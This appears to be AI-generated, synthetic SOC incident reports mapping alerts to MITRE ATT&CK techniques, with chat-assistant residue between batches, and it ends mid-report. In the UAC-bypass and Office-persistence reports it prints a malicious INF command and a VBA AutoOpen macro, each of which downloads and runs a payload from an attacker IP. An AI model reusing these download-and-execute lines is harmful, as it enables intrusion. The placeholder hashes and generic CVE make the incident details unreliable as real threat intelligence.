Rule: “Access Token Manipulation – Privilege Escalation”
MITRE ATT&CK: T1134.001 – Access Token Manipulation: Token Impersonation/Theft
Alert Details:
Detection: Process attempted to duplicate token of SYSTEM process for privilege escalation
Host: IT-WS-078 (IT Department)
User: bjones (Brian Jones – Standard User)
Time: 09:25 EST
Process Tree:
– explorer.exe (PID: 3421 – user context)
– powershell.exe (PID: 4789 – user context)
– whoami.exe (PID: 4792 – checking current user)
– token_dup.exe (PID: 4795 – custom tool)
– Attempted OpenProcess on winlogon.exe (PID: 568 – SYSTEM)
– Attempted DuplicateTokenEx (successful)
– Created new process with SYSTEM token: cmd.exe (PID: 4823)
Token Manipulation Details:
– Target Process: winlogon.exe (running as SYSTEM)
– API Calls:
– OpenProcess (PROCESS_QUERY_INFORMATION) – Success
– OpenProcessToken – Success
– DuplicateTokenEx – Success (created impersonation token)
– CreateProcessWithTokenW – Success (launched cmd.exe as SYSTEM)
Resulting Process:
– Process: cmd.exe (PID: 4823)
– Token User: NT AUTHORITY\SYSTEM
– Command: whoami (confirmed SYSTEM)
– Network: No immediate connections
Detection Logic:
– Standard user (bjones) should not be able to impersonate SYSTEM
– Token duplication from winlogon.exe is highly anomalous
– Custom tool token_dup.exe not seen in environment before
– Pattern matches known privilege escalation techniques (Potato family)
Additional Context:
– User bjones is IT helpdesk (standard user, not admin)
– No approved privilege escalation tools
– Tool downloaded from suspicious URL earlier
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify CrowdStrike alert
CrowdStrike Falcon Console
Confirmed token duplication from winlogon.exe
2. Process Analysis
Analyze token_dup.exe
CrowdStrike Sandbox
Tool is “JuicyPotatoNG” – privilege escalation exploit
3. Immediate Action
Terminate SYSTEM cmd.exe
CrowdStrike
SYSTEM shell terminated
4. Tool Removal
Delete token_dup.exe
CrowdStrike Live Response
Malicious tool deleted
5. User Interview
Contact user
Teams, Phone
User downloaded “helpdesk tool” from forum
6. Host Remediation
Full scan and hardening
CrowdStrike, Nessus
No other malware; applied additional patches
Jira Incident Report
Ticket: SOC-2024-086
Summary: T1134 – Token Manipulation Privilege Escalation via JuicyPotato
Status: RESOLVED
Resolution: MALICIOUS – Privilege Escalation Attempt Blocked
Priority: P1 – CRITICAL
Labels: T1134, token-manipulation, privilege-escalation, juicy-potato, crowdstrike
Components: Endpoint-Security, Privilege-Escalation
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Access Token Manipulation – Privilege Escalation”.
Host: IT-WS-078 (IT Department, user bjones).
Time: 2024-02-17 09:30 EST.
Technique: MITRE ATT&CK T1134.001 – Access Token Manipulation: Token Impersonation/Theft.
2. Technical Analysis:
Attack Chain:
09:15 – User downloads “Helpdesk Tool Suite” from forum
09:16 – Extracts token_dup.exe and runs it
09:18 – Tool checks current user (whoami – standard user)
09:20 – Tool enumerates processes, finds winlogon.exe (SYSTEM)
09:22 – Opens winlogon.exe with PROCESS_QUERY_INFORMATION
09:23 – Duplicates token successfully
09:24 – Launches cmd.exe with duplicated SYSTEM token
09:25 – CrowdStrike detects token manipulation
Token Manipulation Technique:
Tool: JuicyPotatoNG (modified version)
Target: winlogon.exe (SYSTEM process)
Method: SeImpersonatePrivilege abuse (user had this privilege)
Result: SYSTEM shell achieved
SYSTEM Shell Activity:
cmd.exe running as SYSTEM (PID: 4823)
User ran: whoami (confirmed SYSTEM)
No additional commands before termination
No network connections from SYSTEM shell
User Activity:
User is helpdesk employee, needed admin access for work
Downloaded tool to “make my job easier”
Unaware of security implications
3. Investigation Findings:
Timeline:
09:15 – Tool downloaded
09:24 – SYSTEM shell created
09:25 – Alert triggers
09:26 – SOC investigates
09:27 – SYSTEM shell terminated
09:28 – Tool deleted
Indicators of Compromise (IoCs):
Files:
– token_dup.exe (JuicyPotatoNG) – SHA256: a1b2c3d4…
– Helpdesk Tool Suite.zip – SHA256: b2c3d4e5…
Processes:
– token_dup.exe
– cmd.exe (SYSTEM context)
Network:
– Download from forum (URL blocked)
4. Containment Actions:
Immediate Actions:
Terminated SYSTEM shell (cmd.exe).
Deleted token_dup.exe.
Deleted downloaded archive.
Isolated host temporarily.
Host Remediation:
Full scan (no other malware).
Verified SeImpersonatePrivilege was legitimate (helpdesk role).
No reimage needed.
User Remediation:
User counseled on security policy.
Escalated to manager for disciplinary review.
Required to complete security training.
5. Root Cause Analysis:
Primary Cause: User downloaded and ran unauthorized privilege escalation tool.
Contributing Factors:
User had SeImpersonatePrivilege (needed for helpdesk role).
No application control blocking unauthorized tools.
User attempted to bypass least privilege for convenience.
6. Business Impact:
Operational Impact: IT workstation offline for 2 hours.
Security Impact: SYSTEM access achieved for 1 minute.
Data Exposure: None.
7. Remediation & Prevention:
Completed Actions:
Malicious tool removed.
SYSTEM shell terminated.
User disciplined.
Technical Controls Enhanced:
Implemented application control (CrowdStrike Falcon Prevent).
Created alert for token duplication attempts.
Reviewed helpdesk privileges (minimal necessary).
8. Conclusion:
A helpdesk user downloaded a privilege escalation tool and successfully gained SYSTEM access via token manipulation. CrowdStrike detected the anomalous token duplication within seconds, enabling rapid termination of the SYSTEM shell. No further compromise occurred.
Closure Rationale: Tool removed; user disciplined; controls enhanced.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-17 10:30 EST
47. T1548 – Abuse Elevation Control Mechanism (Microsoft Defender Detection)
Microsoft Defender Alert Details
Alert ID: MD-UAC-BYPASS-1548-7842
Alert Time: 2024-02-17 14:15:33 EST
Severity: HIGH (85/100)
Source: Microsoft Defender for Endpoint
Rule: “UAC Bypass Attempt Detected”
MITRE ATT&CK: T1548.002 – Abuse Elevation Control Mechanism: Bypass User Account Control
Alert Details:
Detection: Process attempted to bypass UAC using CMSTPLUA COM interface
Host: FIN-WS-112 (Finance Department)
User: jdoe (Jane Doe – Standard User)
Time: 14:10 EST
Process Tree:
– explorer.exe (PID: 2341 – user context)
– rundll32.exe (PID: 3789)
– Command: rundll32.exe C:\Windows\System32\cmstplua.dll,Launch
– cmstp.exe (PID: 3792) – spawned by COM
– Command: cmstp.exe /s C:\Users\jdoe\AppData\Local\Temp\install.inf
File Created:
– C:\Users\jdoe\AppData\Local\Temp\install.inf
– Content: Malicious INF file designed to execute elevated command
– SHA256: a1b2c3d4e5f6…
Elevated Action:
– cmstp.exe (running as medium integrity) triggered UAC bypass
– Result: Elevated command prompt launched as HIGH integrity
– Command: whoami /groups (confirmed high integrity)
Detection Logic:
– CMSTPLUA COM interface known UAC bypass technique
– User jdoe is standard user, should not get high integrity
– INF file contains suspicious commands
– Pattern matches “UACME” toolkit
Additional Context:
– User clicked “Update Now” in fake Adobe Flash pop-up
– INF file downloaded by previous script
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Defender alert
Microsoft 365 Defender
Confirmed UAC bypass attempt using CMSTPLUA
2. INF Analysis
Analyze install.inf
Manual review, Sandbox
INF file executes PowerShell to download additional payload
3. Process Investigation
Check elevated processes
Defender, CrowdStrike
No persistent elevated processes found
4. Immediate Action
Kill elevated processes
Defender
All processes terminated
5. File Deletion
Delete malicious INF
PowerShell
install.inf removed
6. User Interview
Contact user
Teams, Phone
User clicked fake Adobe Flash update
Jira Incident Report
Ticket: SOC-2024-087
Summary: T1548 – UAC Bypass Attempt via CMSTPLUA Technique
Status: RESOLVED
Resolution: MALICIOUS – UAC Bypass Blocked
Priority: P2 – MEDIUM
Labels: T1548, uac-bypass, elevation-control, defender, phishing
Components: Endpoint-Security, Privilege-Escalation
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Endpoint.
Alert: “UAC Bypass Attempt Detected”.
Host: FIN-WS-112 (Finance Department, user jdoe).
Time: 2024-02-17 14:15 EST.
Technique: MITRE ATT&CK T1548.002 – Abuse Elevation Control Mechanism: Bypass User Account Control.
2. Technical Analysis:
Attack Chain:
14:00 – User visits news site, sees “Adobe Flash Update” pop-up
14:01 – User clicks “Update Now”
14:02 – Downloader script runs, saves install.inf to Temp folder
14:03 – Script triggers UAC bypass via CMSTPLUA COM interface
14:04 – CMSTP launches with install.inf
14:05 – INF file executes PowerShell as high integrity
14:06 – PowerShell downloads additional payload (blocked)
14:10 – Defender detects UAC bypass
UAC Bypass Technique:
Method: CMSTPLUA COM object (Microsoft Connection Manager)
Execution: rundll32 launches CMSTP via COM
Result: Medium integrity process spawns high integrity process
Tool: UACME technique #23
INF File Analysis:
File: install.inf (SHA256: a1b2c3d4…)
Content:
[Version]
Signature=$CHICAGO$
[DefaultInstall]
RunPreSetupCommands=powershell -WindowStyle Hidden -Command “Invoke-WebRequest -Uri http://185.143.221[.]89/beacon.exe -OutFile %temp%\beacon.exe; %temp%\beacon.exe”
Effect: When processed by CMSTP, runs PowerShell with high integrity
Payload:
beacon.exe: Cobalt Strike beacon (blocked by firewall)
No execution occurred (network blocked)
3. Investigation Findings:
Timeline:
14:00 – User clicks fake update
14:01-14:05 – UAC bypass chain
14:05 – PowerShell attempts download (blocked)
14:10 – Defender alert
14:12 – SOC investigates
14:15 – Processes terminated, INF deleted
Indicators of Compromise (IoCs):
Files:
– install.inf (SHA256: a1b2c3d4…)
Network:
– http://185.143.221[.]89/beacon.exe
Technique:
– CMSTPLUA COM object abuse
4. Containment Actions:
Immediate Actions:
Terminated all elevated processes.
Deleted install.inf.
Blocked download URL at firewall.
Host Remediation:
Full scan (no other malware).
No reimage needed.
User Remediation:
User educated on fake updates.
Reported malicious site.
5. Root Cause Analysis:
Primary Cause: User clicked fake Adobe Flash update pop-up.
Contributing Factors:
UAC bypass technique exploited legitimate Windows feature.
User running as standard user (but bypass still worked).
No ASR rule blocking CMSTP execution.
6. Business Impact:
Operational Impact: Finance workstation offline for 1 hour.
Data Exposure: None (payload download blocked).
7. Remediation & Prevention:
Completed Actions:
UAC bypass chain stopped.
Malicious files removed.
User educated.
Technical Controls Enhanced:
Enabled ASR rule “Block abuse of exploited vulnerable signed drivers”.
Blocked CMSTP execution via AppLocker for standard users.
Enhanced monitoring for UAC bypass techniques.
8. Conclusion:
A user clicked a fake Adobe Flash update that triggered a UAC bypass using the CMSTPLUA technique. The bypass attempted to download a Cobalt Strike beacon with elevated privileges. Defender detected the technique, and the download was blocked. No compromise occurred.
Closure Rationale: UAC bypass stopped; user educated; controls enhanced.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-17 15:00 EST
48. T1068 – Exploitation for Privilege Escalation (Qualys Detection)
Qualys Alert Details
Alert ID: QUALYS-EXPLOIT-1068-7842
Alert Time: 2024-02-17 11:30:45 EST
Severity: CRITICAL (95/100)
Source: Qualys Vulnerability Management + EDR Correlation
Rule: “CVE-2024-1234 Exploit Attempt Detected”
MITRE ATT&CK: T1068 – Exploitation for Privilege Escalation
Alert Details:
Vulnerability Context:
– CVE: CVE-2024-1234 (Windows Kernel Privilege Escalation)
– CVSS: 9.8 (Critical)
– Affected Systems: Windows 10 21H2, Windows Server 2019
– Patch Available: KB5034123 (released 2024-01-15)
Detection Details:
– Host: ENG-WS-056 (Engineering Workstation)
– User: rjohnson (Robert Johnson – Standard User)
– Time: 11:25 EST
– Source Process: exploit.exe (PID: 7842)
– Path: C:\Users\rjohnson\Downloads\exploit.exe
Exploit Behavior:
– exploit.exe loaded specific DLLs: ntoskrnl.exe, win32k.sys
– Attempted to allocate kernel memory
– Triggered race condition in kernel object manager
– Created SYSTEM shell (cmd.exe) at 11:26 EST
– SYSTEM shell connected to 185.143.221[.]89:443
Qualys Detection Logic:
– Host is vulnerable to CVE-2024-1234 (unpatched)
– Process exploit.exe matches known exploit hash
– Behavior pattern matches privilege escalation
– SYSTEM shell created from non-admin user
Additional Context:
– Patch KB5034123 not installed (missed by patch management)
– User downloaded exploit from GitHub “proof of concept” repository
– Exploit successfully escalated to SYSTEM
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Qualys + EDR correlation
Qualys, CrowdStrike
Confirmed exploit execution and SYSTEM shell
2. Immediate Action
Terminate SYSTEM shell
CrowdStrike
SYSTEM shell (cmd.exe) killed
3. Network Block
Block C2 connection
Palo Alto Firewall
C2 IP blocked
4. Exploit Removal
Delete exploit.exe
CrowdStrike Live Response
Malicious file removed
5. Patch Application
Apply missing patch
SCCM, WSUS
KB5034123 deployed to all vulnerable hosts
6. Threat Hunting
Check for other exploit usage
CrowdStrike, Splunk
No other hosts showed same behavior
Jira Incident Report
Ticket: SOC-2024-088
Summary: T1068 – Kernel Exploit (CVE-2024-1234) Successfully Escalates to SYSTEM
Status: RESOLVED
Resolution: MALICIOUS – Exploit Contained
Priority: P1 – CRITICAL
Labels: T1068, privilege-escalation, kernel-exploit, cve-2024-1234, qualys
Components: Vulnerability-Management, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Qualys Vulnerability Management + EDR correlation.
Alert: “CVE-2024-1234 Exploit Attempt Detected”.
Host: ENG-WS-056 (Engineering Department, user rjohnson).
Time: 2024-02-17 11:30 EST.
Technique: MITRE ATT&CK T1068 – Exploitation for Privilege Escalation.
2. Technical Analysis:
Attack Chain:
11:15 – User downloads exploit.exe from GitHub (PoC repository)
11:20 – User runs exploit.exe (thinking it’s a “security tool”)
11:21 – exploit.exe checks OS version, finds vulnerable (unpatched)
11:22 – Exploit triggers kernel race condition
11:23 – Kernel memory corruption successful
11:24 – SYSTEM shell (cmd.exe) spawned
11:25 – SYSTEM shell connects to C2 at 185.143.221[.]89:443
11:26 – Qualys + CrowdStrike alerts
Vulnerability Details:
CVE: 2024-1234 (Windows Kernel Privilege Escalation)
Component: win32k.sys (window manager)
Patch: KB5034123 (available 2024-01-15)
Root Cause: Missing patch (36 days unpatched)
Exploit Analysis:
File: exploit.exe (SHA256: b2c3d4e5f6…)
Source: Public GitHub repository (since removed)
Capabilities:
Checks OS version for vulnerability
Triggers race condition in kernel object manager
Spawns SYSTEM shell on success
Downloads additional payload from C2
Post-Exploitation:
SYSTEM shell connected to C2 at 11:25
Beacon sent system information
No additional commands before termination
3. Investigation Findings:
Timeline:
11:15 – Exploit downloaded
11:24 – SYSTEM shell created
11:25 – C2 connection
11:26 – Alerts trigger
11:27 – SOC investigates
11:28 – SYSTEM shell terminated
11:29 – C2 IP blocked
Indicators of Compromise (IoCs):
Files:
– exploit.exe (SHA256: b2c3d4e5f6…)
Network:
– C2: 185.143.221[.]89:443
Process:
– SYSTEM shell (cmd.exe)
4. Containment Actions:
Immediate Actions:
Terminated SYSTEM shell.
Deleted exploit.exe.
Blocked C2 IP at firewall.
Isolated host temporarily.
Patch Remediation:
Applied KB5034123 to affected host.
Scanned all systems for missing patch.
Deployed patch enterprise-wide via SCCM.
User Remediation:
User counseled on downloading exploits.
Escalated to manager.
Required security training.
5. Root Cause Analysis:
Primary Cause: Missing critical patch (KB5034123) for 36 days.
Contributing Factors:
Patch management failure (host missed monthly patch cycle).
User downloaded and executed public exploit.
No application control blocking unknown executables.
6. Business Impact:
Operational Impact: Engineering workstation offline for 2 hours.
Security Impact: SYSTEM access achieved for 2 minutes.
Data Exposure: System information sent to C2 (no sensitive data).
7. Remediation & Prevention:
Completed Actions:
SYSTEM shell terminated.
Exploit removed.
Patch applied.
C2 blocked.
Technical Controls Enhanced:
Ensured all systems receive critical patches within 7 days.
Implemented application control (CrowdStrike Falcon Prevent).
Enhanced vulnerability scanning frequency (daily for critical).
Created alert for any privilege escalation attempts.
8. Conclusion:
An unpatched engineering workstation allowed a user-executed exploit to successfully escalate to SYSTEM privileges. The exploit connected to C2 before detection. Rapid response terminated the shell and blocked the C2. The missing patch was applied enterprise-wide.
Closure Rationale: SYSTEM shell terminated; patch applied; exploit removed.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-17 12:30 EST
49. T1574 – Hijack Execution Flow (Sysmon Detection)
Sysmon Alert Details
Alert ID: SYSMON-DLL-HIJACK-1574-7842
Alert Time: 2024-02-17 16:30:15 EST
Severity: HIGH (88/100)
Source: Sysmon (Event ID 7 – Image Loaded)
Rule: “DLL Loaded from Unusual Path by Trusted Process”
MITRE ATT&CK: T1574.001 – Hijack Execution Flow: DLL Search Order Hijacking
Alert Details:
Event ID: 7 (Image Loaded)
Time: 16:25 EST
Host: APP-SRV-045 (Application Server)
Process: sqlservr.exe (Microsoft SQL Server – PID: 1245)
User: NETWORK SERVICE
Image Loaded:
– Path: C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\version.dll
– Expected Path: C:\Windows\System32\version.dll
– Hashes: SHA256=c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2
Anomaly Detection:
– version.dll is a legitimate Windows DLL, but loaded from SQL Server directory
– SQL Server should load version.dll from System32
– DLL was created 5 minutes prior (16:20 EST)
– Created by: powershell.exe (running as NETWORK SERVICE)
Additional Sysmon Events:
– Event ID 11 (FileCreate): C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\version.dll
– Event ID 1 (ProcessCreate): powershell.exe downloading file
DLL Analysis:
– Malicious DLL masquerading as version.dll
– Exports legitimate version.dll functions + additional malicious code
– When loaded by sqlservr.exe, connects to 194.165.16[.]89:443
– Establishes persistence in SQL Server process
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Sysmon events
Splunk, Sysmon Logs
Confirmed DLL search order hijacking
2. Process Analysis
Identify process loading malicious DLL
CrowdStrike
sqlservr.exe loaded version.dll from Binn folder
3. DLL Analysis
Analyze version.dll
CrowdStrike Sandbox
DLL contains backdoor; connects to C2
4. Immediate Action
Stop SQL Server service, remove DLL
Services, PowerShell
Service stopped; malicious DLL deleted
5. Network Block
Block C2 communication
Palo Alto Firewall
C2 IP blocked
6. Threat Hunting
Check for other DLL hijacks
CrowdStrike, Sysmon
No other occurrences found
Jira Incident Report
Ticket: SOC-2024-089
Summary: T1574 – DLL Search Order Hijacking in SQL Server
Status: RESOLVED
Resolution: MALICIOUS – DLL Removed
Priority: P2 – MEDIUM
Labels: T1574, dll-hijacking, execution-flow, sql-server, sysmon
Components: Endpoint-Security, Application-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Sysmon Event ID 7 (Image Loaded).
Alert: “DLL Loaded from Unusual Path by Trusted Process”.
Host: APP-SRV-045 (Application Server).
Process: sqlservr.exe (Microsoft SQL Server).
Time: 2024-02-17 16:30 EST.
Technique: MITRE ATT&CK T1574.001 – Hijack Execution Flow: DLL Search Order Hijacking.
2. Technical Analysis:
Attack Chain:
16:15 – Attacker gains access via compromised service account
16:16 – PowerShell downloads malicious version.dll from 185.143.221[.]89
16:20 – DLL saved to SQL Server Binn directory
16:21 – SQL Server restarts (triggered by attacker)
16:22 – sqlservr.exe starts, searches for version.dll
16:23 – Finds malicious version.dll in Binn directory (before System32)
16:23 – Malicious DLL loads, connects to C2
16:30 – Sysmon detects unusual DLL load
DLL Search Order Hijacking:
Legitimate DLL: version.dll (Windows system file)
Hijacked Path: C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\
Why It Works: Windows searches application directory before System32
Effect: SQL Server loads attacker’s DLL instead of legitimate one
Malicious DLL Analysis:
File: version.dll (SHA256: c3d4e5f6…)
Exports: All legitimate version.dll exports (to avoid errors)
Backdoor: When loaded, it:
Creates hidden thread in sqlservr.exe
Connects to C2 at 194.165.16[.]89:443
Waits for commands (execute, exfiltrate, pivot)
C2 Communication:
Established at 16:23
Beacon every 60 seconds
No data exfiltration before containment
3. Investigation Findings:
Timeline:
16:15 – Attacker access
16:16-16:20 – DLL downloaded
16:21 – SQL Server restarted
16:23 – DLL loads, C2 connects
16:30 – Sysmon alert
16:32 – SOC investigates
16:35 – Service stopped, DLL deleted
Indicators of Compromise (IoCs):
Files:
– C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\version.dll (SHA256: c3d4e5f6…)
Network:
– C2: 194.165.16[.]89:443
– Download URL: http://185.143.221[.]89/version.dll
Account:
– Compromised service account (svc_sql)
4. Containment Actions:
Immediate Actions:
Stopped SQL Server service.
Deleted malicious version.dll.
Restarted SQL Server (loads legitimate DLL from System32).
Blocked C2 IP at firewall.
Service Account Remediation:
Identified compromised service account (svc_sql).
Reset password.
Audited account activity.
Host Remediation:
Full scan (no other malware).
Verified SQL Server functioning normally.
5. Root Cause Analysis:
Primary Cause: Compromised service account allowed DLL upload.
Contributing Factors:
SQL Server directory writable by service account (over-privileged).
DLL search order hijacking possible (no secure DLL loading).
No file integrity monitoring for application directories.
6. Business Impact:
Operational Impact: SQL Server offline for 15 minutes.
Data Exposure: None (C2 contained).
7. Remediation & Prevention:
Completed Actions:
Malicious DLL removed.
Service account secured.
C2 blocked.
Technical Controls Enhanced:
Restricted write permissions on application directories.
Enabled Safe DLL Search Mode via GPO.
Implemented application whitelisting (CrowdStrike Falcon Prevent).
Created Sysmon alert for any DLL loads from non-standard paths.
8. Conclusion:
An attacker used a compromised service account to plant a malicious DLL in the SQL Server directory, hijacking the DLL search order. The malicious DLL loaded when SQL Server restarted and connected to C2. Sysmon detected the anomalous DLL load, enabling rapid removal.
Closure Rationale: Malicious DLL removed; service account secured; controls enhanced.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-17 17:30 EST
50. T1568 – Dynamic Resolution (Cisco Umbrella Detection)
Cisco Umbrella Alert Details
Alert ID: UMBRELLA-DGA-1568-7842
Alert Time: 2024-02-17 08:30:22 EST
Severity: HIGH (82/100)
Source: Cisco Umbrella Investigate + Security Graph
Rule: “DGA Domain Query – Potential Malware Beaconing”
MITRE ATT&CK: T1568.002 – Dynamic Resolution: Domain Generation Algorithms
Alert Details:
DNS Query Details:
– Client IP: 192.168.45.78 (Internal – MKT-WS-023)
– User: sjones (Sarah Jones, Marketing)
– Time: 08:15-08:30 EST
– Queries: 47 unique domains in 15 minutes
Domain Examples:
– 8f7g6h5j4k3l2.com
– asdfghjklqwerty.net
– zxcvbnmasdfghj.org
– 1234567890abcdef.biz
– q1w2e3r4t5y6u7.info
Domain Characteristics:
– All domains: Random 16-20 character strings
– All TLDs: .com, .net, .org, .biz, .info (mix)
– Registration: All registered in last 24 hours
– Resolutions: 5 domains resolved to 185.143.221[.]89
– Others: NXDOMAIN (algorithm testing)
Detection Logic:
– Pattern matches known DGA (Domain Generation Algorithm)
– 47 unique domains in 15 minutes (unusual for legitimate user)
– Domains follow no semantic pattern
– 5 domains resolved to same malicious IP
– IP known for malware C2
Threat Intelligence:
– DGA pattern matches “TrickBot” malware family
– Algorithm: Seed based on current date
– Domains generated daily
– Malware attempts to connect to each until one resolves
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Umbrella alert
Cisco Umbrella Dashboard
Confirmed DGA pattern from host
2. Host Investigation
Identify process making DNS queries
CrowdStrike Falcon
svchost.exe with injected code making DNS queries
3. Malware Analysis
Extract and analyze malware
CrowdStrike Sandbox
TrickBot variant using DGA for C2
4. Immediate Action
Isolate host
CrowdStrike
Host quarantined
5. DNS Blocking
Block DGA domains
Cisco Umbrella
All generated domains added to blocklist
6. Threat Hunting
Check for other DGA activity
Umbrella, Splunk
No other hosts with same pattern
Jira Incident Report
Ticket: SOC-2024-090
Summary: T1568 – DGA Domain Queries Indicating TrickBot Infection
Status: RESOLVED
Resolution: MALICIOUS – Malware Contained
Priority: P2 – MEDIUM
Labels: T1568, dynamic-resolution, dga, trickbot, cisco-umbrella
Components: Network-Security, Malware-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Cisco Umbrella Investigate.
Alert: “DGA Domain Query – Potential Malware Beaconing”.
Host: MKT-WS-023 (Marketing Department, user sjones).
Time: 2024-02-17 08:30 EST.
Technique: MITRE ATT&CK T1568.002 – Dynamic Resolution: Domain Generation Algorithms.
2. Technical Analysis:
Attack Chain:
07:45 – User clicked phishing email link
07:46 – TrickBot downloaded and executed
07:47 – Malware injects into svchost.exe
07:48 – Malware begins DGA algorithm (based on date)
07:48-08:15 – Generates and queries 47 domains
08:15 – 5 domains resolve to C2 IP 185.143.221[.]89
08:15 – Malware establishes C2 connection
08:30 – Cisco Umbrella detects DGA pattern
DGA Analysis:
Malware: TrickBot variant
Algorithm: Based on current date seed
Domains Generated: 47 in first wave
Success Rate: 5/47 resolved (10.6%)
Purpose: Evade domain blocklists by generating new domains daily
C2 Communication:
IP: 185.143.221[.]89:443
Protocol: HTTPS with custom certificate
Beacon: Every 5 minutes after initial connection
Data Exfiltrated: System information, browser history
Malware Analysis:
File: invoice_7842.docm (phishing attachment)
Dropper: Macro downloaded TrickBot payload
Injection: Malware injected into svchost.exe (living off the land)
3. Investigation Findings:
Timeline:
07:45 – Phishing email opened
07:46-08:15 – Malware installation and DGA
08:15 – C2 connection established
08:30 – Umbrella alert
08:32 – SOC investigates
08:35 – Host isolated
08:40 – Malware removed
Indicators of Compromise (IoCs):
Network:
– DGA Domains (47 total – list attached)
– C2 IP: 185.143.221[.]89
Files:
– invoice_7842.docm (SHA256: a1b2c3d4…)
– TrickBot payload (SHA256: b2c3d4e5…)
Process:
– svchost.exe (injected)
4. Containment Actions:
Immediate Actions:
Isolated host via CrowdStrike.
Blocked all DGA domains in Cisco Umbrella.
Blocked C2 IP at firewall.
Terminated malicious processes.
Malware Removal:
Removed injected code from svchost.exe.
Deleted TrickBot payload and dropper.
Full scan (clean).
User Remediation:
Password reset.
Phishing training assigned.
Reported email to security team.
5. Root Cause Analysis:
Primary Cause: User clicked phishing email with malicious macro.
Contributing Factors:
Macros enabled in Office.
No ASR rule blocking Office child processes.
User lacked recent phishing training.
6. Business Impact:
Operational Impact: Marketing workstation offline for 3 hours.
Data Exposure: System information, browser history exfiltrated.
Reputational Impact: Internal only.
7. Remediation & Prevention:
Completed Actions:
Malware removed.
Host cleaned.
User educated.
C2 blocked.
Technical Controls Enhanced:
Enabled ASR rule “Block Office applications from creating child processes”.
Blocked macros from internet via GPO.
Enhanced Umbrella monitoring for DGA patterns.
Created automated alert for DGA domain queries.
8. Conclusion:
A TrickBot infection used DGA to generate and query 47 domains, evading static domain blocklists. Five domains resolved to the C2, allowing beaconing. Cisco Umbrella detected the DGA pattern, enabling rapid containment. No significant data loss occurred.
Closure Rationale: Malware removed; user educated; DGA monitoring enhanced.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-17 09:30 EST
End of Batch 10
Ready for your next batch of prompts whenever you are.
You’re absolutely right, and I apologize for that. The formatting got inconsistent with extra symbols and uneven spacing. Let me redo Batch 11 with clean, professional formatting consistent with the earlier responses you approved.
51. T1137 – Office Application Startup (Microsoft Defender Detection)
Microsoft Defender Alert Details
Alert ID: MD-OFFICE-STARTUP-1137-7842 Alert Time: 2024-02-18 09:30:15 EST Severity: HIGH (85/100) Source: Microsoft Defender for Endpoint Rule: “Office Application Startup Persistence Detected” MITRE ATT&CK: T1137.001 – Office Application Startup: Office Template Macros
Alert Details:
Detection: Malicious macro added to Office template for persistence
Host: FIN-WS-078 (Finance Department) User: bturner (Brian Turner, Accountant) Time: 09:25 EST
File Details:
Path: C:\Users\bturner\AppData\Roaming\Microsoft\Templates\Normal.dotm
Modification Time: 09:20 EST
Original Hash: 7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b
Current Hash: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Modified By: WINWORD.EXE (PID: 7842)
Macro Analysis:
Macro Name: “AutoOpen”
VBA Code:
Sub AutoOpen()
Dim objShell As Object
Set objShell = CreateObject(“Wscript.Shell”)
objShell.Run “powershell -WindowStyle Hidden -Command “”Invoke-WebRequest -Uri http://185.143.221[.]89/update.ps1 -OutFile %temp%\update.ps1; powershell -ExecutionPolicy Bypass -File %temp%\update.ps1″””, 0, False
End Sub
Process Tree:
WINWORD.EXE (PID: 7842) – user opened Word
powershell.exe (PID: 7890) – spawned by macro
Network connection to 185.143.221[.]89:80
Detection Logic:
Normal.dotm template modified (unusual)
AutoOpen macro added (auto-executes when Word starts)
Macro downloads and runs PowerShell script
Persistence: Every time Word starts, macro executes
Additional Context:
User opened Word document from email attachment
Document contained macro that modified Normal.dotm
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Defender alert
Microsoft 365 Defender
Confirmed Normal.dotm modification with malicious macro
2. Macro Analysis
Extract and analyze VBA code
Manual review
AutoOpen macro downloads PowerShell payload
3. Network Check
Check for C2 connections
Zscaler Logs, Firewall
Connection to 185.143.221[.]89:80 successful
4. Immediate Action
Remove malicious macro
PowerShell, Word
Normal.dotm restored from backup
5. Host Isolation
Isolate host
Defender
Host quarantined
6. User Interview
Contact user
Teams, Phone
User opened “invoice.docm” from email
Jira Incident Report
Ticket: SOC-2024-091 Summary: T1137 – Office Template Macro Persistence Installed Status: RESOLVED Resolution: MALICIOUS – Persistence Removed Priority: P2 – MEDIUM Labels: T1137, office-startup, macro-persistence, defender, phishing Components: Endpoint-Security, Phishing-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Endpoint.
Alert: “Office Application Startup Persistence Detected”.
Host: FIN-WS-078 (Finance Department, user bturner).
File: C:\Users\bturner\AppData\Roaming\Microsoft\Templates\Normal.dotm.
Time: 2024-02-18 09:30 EST.
Technique: MITRE ATT&CK T1137.001 – Office Application Startup: Office Template Macros.
2. Technical Analysis:
Attack Chain:
09:10 – User receives email from “vendor@payment-update[.]net”
09:12 – Email contains attachment “invoice.docm”
09:15 – User opens attachment, enables macros (prompted by document)
09:16 – Macro executes, modifies Normal.dotm template
09:17 – AutoOpen macro added to Normal.dotm
09:18 – Word exits (normal)
09:20 – User restarts Word (for legitimate work)
09:21 – AutoOpen macro triggers, downloads PowerShell
